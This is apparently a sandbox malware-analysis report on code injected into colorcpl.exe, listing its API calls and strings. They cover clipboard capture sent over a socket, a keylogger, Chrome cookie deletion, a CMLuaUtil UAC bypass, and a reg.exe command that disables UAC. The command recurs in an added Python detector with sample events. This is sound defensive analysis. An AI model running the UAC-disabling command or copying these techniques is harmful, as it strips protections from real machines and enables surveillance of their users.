                                                          • EmptyClipboard.USER32 ref: 02FA698A
                                                          • CloseClipboard.USER32 ref: 02FA6990
                                                          • OpenClipboard.USER32 ref: 02FA6997
                                                          • GetClipboardData.USER32(0000000D), ref: 02FA69A7
                                                          • GlobalLock.KERNEL32(00000000), ref: 02FA69B0
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 02FA69B9
                                                          • CloseClipboard.USER32 ref: 02FA69BF
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                          • String ID:
                                                          • API String ID: 2172192267-0
                                                          • Opcode ID: e85d7a0d7872fc19a526c3ce81347619a8159a70fe8113ce85822c16a662fe82
                                                          • Instruction ID: 475d61848598f5a5d484f56df8ed15162f2321af30af798c841e61326887d0dd
                                                          • Opcode Fuzzy Hash: e85d7a0d7872fc19a526c3ce81347619a8159a70fe8113ce85822c16a662fe82
                                                          • Instruction Fuzzy Hash: C0015E71A44208DFDB15BB70DC58AAEB7AAAF907C1F40086DE606861C0DFB58815CA61
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: dbc35d27752e36bfd7472e9f2f8e0768f432deac141ef2e3ff62114524d14f82
                                                          • Instruction ID: c760b0a42baf61c2400b1da0122bb627ac3cd806657c4cc912f8f964b7dc7df8
                                                          • Opcode Fuzzy Hash: dbc35d27752e36bfd7472e9f2f8e0768f432deac141ef2e3ff62114524d14f82
                                                          • Instruction Fuzzy Hash: 0761AF76D00205AFDF21DF68CC41B9ABBFAEF05790F14416AEA45FB281EBB09941DB50
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,02FDBBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 02FDB47E
                                                          • __fassign.LIBCMT ref: 02FDB4F9
                                                          • __fassign.LIBCMT ref: 02FDB514
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 02FDB53A
                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,02FDBBB1,00000000,?,?,?,?,?,?,?,?,?,02FDBBB1,?), ref: 02FDB559
                                                          • WriteFile.KERNEL32(?,?,00000001,02FDBBB1,00000000,?,?,?,?,?,?,?,?,?,02FDBBB1,?), ref: 02FDB592
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: 3d38e0534c2c93b1171e783f9d1ca7b163c50f772bfd496311931d5cb2de32b2
                                                          • Instruction ID: f4b935e4b0bdddadec7ee94924e24c1a5c5e73ca9094b5706341cae92874468e
                                                          • Opcode Fuzzy Hash: 3d38e0534c2c93b1171e783f9d1ca7b163c50f772bfd496311931d5cb2de32b2
                                                          • Instruction Fuzzy Hash: 3751C3B1E002099FCB10CFA8D884BEEBBB9EF08344F19455AEA51E7281DB709951CB60
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 029f9595e4b64a457aa3dc48954505ac5b9784b39db3608599f6a28904b20552
                                                          • Instruction ID: ae9b1383103627e1a4fd87567627be76e79ca7559eb2b3a9c4baa0eb9d0404cd
                                                          • Opcode Fuzzy Hash: 029f9595e4b64a457aa3dc48954505ac5b9784b39db3608599f6a28904b20552
                                                          • Instruction Fuzzy Hash: 5D11B7B2905219BFDF226FBA9C04A5B7A6EEF857E1B144619BA16C7250DE308801CB70
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,02FCA3D1,02FC933E), ref: 02FCA3E8
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02FCA3F6
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02FCA40F
                                                          • SetLastError.KERNEL32(00000000,?,02FCA3D1,02FC933E), ref: 02FCA461
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: d44d161f1afb542dc88f51ca0baf7df6d355b85dedd6b168571dab8bac552c33
                                                          • Instruction ID: 19d3f1a73c839d93f65c9ced0a8aadb5ea3ee1503e0ca8b66c249cc2641ea8b3
                                                          • Opcode Fuzzy Hash: d44d161f1afb542dc88f51ca0baf7df6d355b85dedd6b168571dab8bac552c33
                                                          • Instruction Fuzzy Hash: CB014C77B0931B5EDB153BB9BF88A6B364ADB013F9730423DFB14440E5EFA158009540
                                                          APIs
                                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\colorcpl.exe), ref: 02F9760B
                                                            • Part of subcall function 02F97538: _wcslen.LIBCMT ref: 02F9755C
                                                            • Part of subcall function 02F97538: CoGetObject.OLE32(?,00000024,02FF6528,00000000), ref: 02F975BD
                                                          • CoUninitialize.OLE32 ref: 02F97664
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                          • String ID: C:\Windows\SysWOW64\colorcpl.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                          • API String ID: 3851391207-3410284080
                                                          • Opcode ID: 49329e9a6ea76b0e21a5267b3fe2cd03f59e64151bc6b0d0b83bf8fc5236313a
                                                          • Instruction ID: 5dd6ba3e3281162fb3a9a40ce419b5fe526a9cc2c0bdd13236726dd58f11d4fe
                                                          • Opcode Fuzzy Hash: 49329e9a6ea76b0e21a5267b3fe2cd03f59e64151bc6b0d0b83bf8fc5236313a
                                                          • Instruction Fuzzy Hash: 370196B27213146BFB247A54DD4AF6BB74DDF41AA5F11011EF7018A240EB91EC018EB1
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 02F9BB18
                                                          • GetLastError.KERNEL32 ref: 02F9BB22
                                                          Strings
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 02F9BAE3
                                                          • UserProfile, xrefs: 02F9BAE8
                                                          • [Chrome Cookies found, cleared!], xrefs: 02F9BB48
                                                          • [Chrome Cookies not found], xrefs: 02F9BB3C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                          • API String ID: 2018770650-304995407
                                                          • Opcode ID: a567ecc9acc289fa8df8c100f72498e1e940fa7d7e5cebc9090abcd729cf0a68
                                                          • Instruction ID: 577f01c1ca91cde7873902714a87e5dfc81c41ede6786da5cdf0e2af074ca2ce
                                                          • Opcode Fuzzy Hash: a567ecc9acc289fa8df8c100f72498e1e940fa7d7e5cebc9090abcd729cf0a68
                                                          • Instruction Fuzzy Hash: E301D632E8410D5A7F04FBB5DC169BE772AAD216D8B400129D717932D4FE4289598BD2
                                                          APIs
                                                          • __allrem.LIBCMT ref: 02FCACE9
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FCAD05
                                                          • __allrem.LIBCMT ref: 02FCAD1C
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FCAD3A
                                                          • __allrem.LIBCMT ref: 02FCAD51
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FCAD6F
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                          • Instruction ID: 862de2926c1cdc5237c1378fa0c79c6017913c157262b45ccbd0ba43181ce37e
                                                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                          • Instruction Fuzzy Hash: 4B81FB76E00B0B5BE7259E78CD41B6AB3AADF407E4F34452EE712D6680EB74E9018F50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe
                                                          • String ID:
                                                          • API String ID: 4189289331-0
                                                          • Opcode ID: 0bf38ba6c5c8d666e0c9e3e24f2f05e6aa72e68d51e438e7ab063766f4c391cc
                                                          • Instruction ID: 30b970ed154b3427a63cf05052fccb167628b896d9572199f88f1083a470e773
                                                          • Opcode Fuzzy Hash: 0bf38ba6c5c8d666e0c9e3e24f2f05e6aa72e68d51e438e7ab063766f4c391cc
                                                          • Instruction Fuzzy Hash: AC510B72D00205ABDB249B688C81FAE77ABEF483F4FAC421EEA15D61D1DB31C504DE64
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16_free
                                                          • String ID: a/p$am/pm
                                                          • API String ID: 2936374016-3206640213
                                                          • Opcode ID: b90b22e5a336c111d3cb6f34f78d18cd024f637f6bd2d0d27014bfb2a3056467
                                                          • Instruction ID: fd97a4bacfed99c7695a69f49c2b89028cd2bb19b83707b07b174ac650c19c42
                                                          • Opcode Fuzzy Hash: b90b22e5a336c111d3cb6f34f78d18cd024f637f6bd2d0d27014bfb2a3056467
                                                          • Instruction Fuzzy Hash: 1FD1D332E00206CADB29BF68C855BBAF7B3EF05384F2C455ADB05AF254D3359A41CB91
                                                          APIs
                                                          • GetLastError.KERNEL32(00000020,?,02FCA875,?,?,?,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B), ref: 02FD8299
                                                          • _free.LIBCMT ref: 02FD82CC
                                                          • _free.LIBCMT ref: 02FD82F4
                                                          • SetLastError.KERNEL32(00000000,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B,?,00000041,00000000,00000000), ref: 02FD8301
                                                          • SetLastError.KERNEL32(00000000,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B,?,00000041,00000000,00000000), ref: 02FD830D
                                                          • _abort.LIBCMT ref: 02FD8313
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: 7dc4e97bbdd51681f121e7a1f161c008af495bc94782c1a539d725d6d1f0dbf8
                                                          • Instruction ID: b5dea79231078891a737fa9bceda62667cf52fcf8a94018cff17b91ed7267954
                                                          • Opcode Fuzzy Hash: 7dc4e97bbdd51681f121e7a1f161c008af495bc94782c1a539d725d6d1f0dbf8
                                                          • Instruction Fuzzy Hash: F2F0A476981A007BD716B638BC08F6B361B8FC27E6F2D0514FB18D61C1EF6488039964
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,02FAA6B4,00000000), ref: 02FAAB46
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,02FAA6B4,00000000), ref: 02FAAB5A
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02FAA6B4,00000000), ref: 02FAAB67
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02FAA6B4,00000000), ref: 02FAAB76
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02FAA6B4,00000000), ref: 02FAAB88
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02FAA6B4,00000000), ref: 02FAAB8B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 7892c50add29787cd404a2972a6d5b61bce4ded9c4cc338c974384f633514d32
                                                          • Instruction ID: ef7181083abba7ec0c900c49914601c68a682cd3fe8896d8cdeff512c666bb98
                                                          • Opcode Fuzzy Hash: 7892c50add29787cd404a2972a6d5b61bce4ded9c4cc338c974384f633514d32
                                                          • Instruction Fuzzy Hash: B2F0F63198122CBBDB12AA359C48EFF7B7CDB45AE0F400056FF0986141EBA48D15C9F0
                                                          APIs
                                                            • Part of subcall function 02FA3656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,030050E4), ref: 02FA3678
                                                            • Part of subcall function 02FA3656: RegQueryValueExW.ADVAPI32(?,02F9F34E,00000000,00000000,?,00000400), ref: 02FA3697
                                                            • Part of subcall function 02FA3656: RegCloseKey.ADVAPI32(?), ref: 02FA36A0
                                                            • Part of subcall function 02FAC048: GetCurrentProcess.KERNEL32(?,?,?,02F9DAE5,WinDir,00000000,00000000), ref: 02FAC059
                                                          • _wcslen.LIBCMT ref: 02FAB7F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                          • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                          • API String ID: 37874593-4246244872
                                                          • Opcode ID: 436c4d1065b5dfa623b7b8612524612799fc1701a574415537200485967351f4
                                                          • Instruction ID: 6ca50fac5f74307ef51f4fbf5ac039581b20f40ccdac160c726f733376c1321c
                                                          • Opcode Fuzzy Hash: 436c4d1065b5dfa623b7b8612524612799fc1701a574415537200485967351f4
                                                          • Instruction Fuzzy Hash: 5B218B72B0010867EF14FAB48C91EBE775F9F447E4F14047DE716A7290EE249D094A60
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02F9B1AD
                                                          • wsprintfW.USER32 ref: 02F9B22E
                                                            • Part of subcall function 02F9A671: SetEvent.KERNEL32(?,?,00000000,02F9B245,00000000), ref: 02F9A69D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventLocalTimewsprintf
                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                          • API String ID: 1497725170-248792730
                                                          • Opcode ID: fede40a8b8ee8d12a3d1cb1efacab5fc25ca93641c1bd269de6fa8f7a722f3f3
                                                          • Instruction ID: 2f019a879d5ac63b279ac401c7557abad98ec71b2af2e50eac1d92d2ce944d82
                                                          • Opcode Fuzzy Hash: fede40a8b8ee8d12a3d1cb1efacab5fc25ca93641c1bd269de6fa8f7a722f3f3
                                                          • Instruction Fuzzy Hash: 0811967240011DAADF19FB94EC508FF77BDAE48391B00012EF60696190FF745A45CFA4
                                                          APIs
                                                          • RegisterClassExA.USER32(00000030), ref: 02FAD5EC
                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02FAD607
                                                          • GetLastError.KERNEL32 ref: 02FAD611
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                          • String ID: 0$MsgWindowClass
                                                          • API String ID: 2877667751-2410386613
                                                          • Opcode ID: 6bcc75a61001c83b004135a69649ff0dff2ee5f506a779fa8eb1c61547075aff
                                                          • Instruction ID: daf6c329446220b4b076bde3c2b28ae6c3421c4ba93f2bb3ed93e83e050b0a42
                                                          • Opcode Fuzzy Hash: 6bcc75a61001c83b004135a69649ff0dff2ee5f506a779fa8eb1c61547075aff
                                                          • Instruction Fuzzy Hash: 5E01E5B1D0021DABDB11DFA9DC849EFBBBCEE04294F40092AFA14A6240EB7159058AB0
                                                          APIs
                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02F977D6
                                                          • CloseHandle.KERNEL32(?), ref: 02F977E5
                                                          • CloseHandle.KERNEL32(?), ref: 02F977EA
                                                          Strings
                                                          • C:\Windows\System32\cmd.exe, xrefs: 02F977D1
                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 02F977CC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreateProcess
                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                          • API String ID: 2922976086-4183131282
                                                          • Opcode ID: 50663cd1b30f99f251587c7e0b9f85813b3893ace95af4ab20a0aae629f331ad
                                                          • Instruction ID: 7e24bfc3e010b735b236cb0bee02a33ff50ba77e6819c892c06af7a4172766a6
                                                          • Opcode Fuzzy Hash: 50663cd1b30f99f251587c7e0b9f85813b3893ace95af4ab20a0aae629f331ad
                                                          • Instruction Fuzzy Hash: F3F090B2D4029C7ADB20AAD69C0DEDFBF3DEBC2B90F00051AFB04E6104EA705410CAB0
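The record above shows the injected code in colorcpl.exe launching cmd.exe /k with reg.exe to write EnableLUA = 0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, which switches UAC off for every later elevation once the machine reboots. The write itself is the detection opportunity. The following Python is an added example, not part of the Joe Sandbox report: it runs a detector over constructed process-creation events (the field names pid, image, cmdline and parent_image are assumed, loosely modelled on Sysmon Event ID 1) and flags any reg add that sets EnableLUA to zero under that key, independent of argument order, quoting, hive abbreviation, %windir% prefix, or decimal versus hex data. The first event reproduces the command line from the record verbatim; the others are constructed variants and decoys.

```python
import re
from typing import Optional

# Registry key whose EnableLUA value (0 = off) controls UAC prompting.
UAC_POLICY_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\policies\system"

# Hive abbreviations accepted by reg.exe, mapped to canonical hive names.
HIVES = {
    "hklm": "hkey_local_machine",
    "hkcu": "hkey_current_user",
    "hkcr": "hkey_classes_root",
    "hku": "hkey_users",
    "hkcc": "hkey_current_config",
}

# 'reg add <key>' anywhere in the line, e.g. behind 'cmd.exe /k %windir%\System32\reg.exe'.
REG_ADD_RE = re.compile(r"\breg(?:\.exe)?\s+add\s+(?P<key>\S+)", re.IGNORECASE)
VALUE_RE = re.compile(r"(?:^|\s)/v\s+(?P<name>\S+)", re.IGNORECASE)
DATA_RE = re.compile(r"(?:^|\s)/d\s+(?P<data>\S+)", re.IGNORECASE)

# Constructed process-creation events (not from the sandbox log). Event 4120
# carries the exact command line from the disassembly record above.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f",
     "parent_image": r"C:\Windows\SysWOW64\colorcpl.exe"},
    {"pid": 4131, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg  add "hklm\software\microsoft\windows\currentversion\policies\system" /t reg_dword /d 0x0 /v enablelua /f',
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 5002, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 5010, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 5044, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKCU\Software\Contoso /v EnableLUA /t REG_DWORD /d 0 /f",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
]


def canonical_key(key: str) -> str:
    """Lower-case a registry path and expand its hive abbreviation."""
    key = key.strip("\\").lower()
    hive, sep, rest = key.partition("\\")
    return HIVES.get(hive, hive) + sep + rest


def parse_reg_add(cmdline: str) -> Optional[dict]:
    """Return {key, value, data} for a 'reg add' command line, else None.

    Double quotes only group arguments for reg.exe, so they are dropped
    before matching. Data is parsed with base 0 so '0' and '0x0' both
    become integer 0; non-numeric data (REG_SZ and friends) stays a string.
    """
    flat = cmdline.replace('"', "")
    m = REG_ADD_RE.search(flat)
    if not m:
        return None
    v = VALUE_RE.search(flat)
    d = DATA_RE.search(flat)
    data = None
    if d:
        try:
            data = int(d.group("data"), 0)
        except ValueError:
            data = d.group("data")
    return {
        "key": canonical_key(m.group("key")),
        "value": v.group("name").lower() if v else "",  # "" means (Default)
        "data": data,
    }


def is_uac_disable(cmdline: str) -> bool:
    """True when the command line writes EnableLUA = 0 under the UAC policy key."""
    p = parse_reg_add(cmdline)
    return (p is not None
            and p["key"] == UAC_POLICY_KEY
            and p["value"] == "enablelua"
            and p["data"] == 0)


def scan_events(events: list) -> list:
    """Flag process-creation events whose command line disables UAC."""
    hits = []
    for ev in events:
        if is_uac_disable(ev["cmdline"]):
            hits.append({"pid": ev["pid"], "parent_image": ev["parent_image"],
                         "reason": "reg add EnableLUA=0 (UAC disabled at next boot)"})
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit)
```

The parent image is carried through in each hit because, as in this sample, the writer of EnableLUA is rarely an administrator's console; a SysWOW64 colorcpl.exe spawning cmd.exe is the kind of parent that should raise the finding's severity on its own.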
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02FD338B,?,?,02FD332B,?), ref: 02FD33FA
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02FD340D
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,02FD338B,?,?,02FD332B,?), ref: 02FD3430
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 909481b0a463e27e4fb6316aaaff88acb3fa131439dcaff18d3b74e0166b0fa6
                                                          • Instruction ID: bc30c0839b75b31a14d9d1a0d132131f37af88c2b57beb562a16ecf9a5f05a3a
                                                          • Opcode Fuzzy Hash: 909481b0a463e27e4fb6316aaaff88acb3fa131439dcaff18d3b74e0166b0fa6
                                                          • Instruction Fuzzy Hash: D6F0A430D4020DFBDF129FA0DC08B9DBFB9EB08795F0040A8FA06A6140DBB59A50CB91
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,03004EF8,02F94E7A,00000001,?,00000000,03004EF8,02F94CA8,00000000,?,?,?), ref: 02F95120
                                                          • SetEvent.KERNEL32(?,?,00000000,03004EF8,02F94CA8,00000000,?,?,?), ref: 02F9512C
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,03004EF8,02F94CA8,00000000,?,?,?), ref: 02F95137
                                                          • CloseHandle.KERNEL32(?,?,00000000,03004EF8,02F94CA8,00000000,?,?,?), ref: 02F95140
